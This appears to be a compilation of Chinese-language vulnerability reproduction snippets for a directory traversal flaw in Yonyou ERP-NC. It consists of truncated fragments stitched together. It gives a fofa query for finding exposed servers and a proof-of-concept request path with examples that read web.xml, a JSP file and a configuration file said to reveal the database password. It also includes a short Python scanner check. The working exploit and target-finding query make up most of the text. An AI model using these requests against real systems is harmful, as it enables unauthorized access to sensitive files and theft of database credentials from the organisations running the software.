漏洞复现 fofa语法:app="用友-UFIDA-NC" 用友ERP-NC页面如下: POC: /NCFindWeb?service=IPreAlertConfigService&filename= 在filename 后面加文件名即可读取文件,此处读取 WEB-INF/web.xml 文件: http://vul/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml 可以读取到数据库密码...
name = '用友ERP-NC 目录遍历漏洞' core.start_echo(name) path = "/NCFindWeb?service=IPreAlertConfigService&filename=" r = core.get(url, path) if r: if "jsp" in r.text: core.end_echo(name, 'Payload:' + url + path) core.result(name, 'Payload:' + url + path) else: core.end...
用友ERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息 fofa:app=”用友-UFIDA-NC” POC & EXP http://127.0.0.1/NCFindWeb?service=IPreAlertConfigService&filename= 在filename后面加文件名即可读取文件 http://127.0.0.1/NCFindWeb?service=IPreAlertConfigService&filename=ncwslogin.jsp 转载请...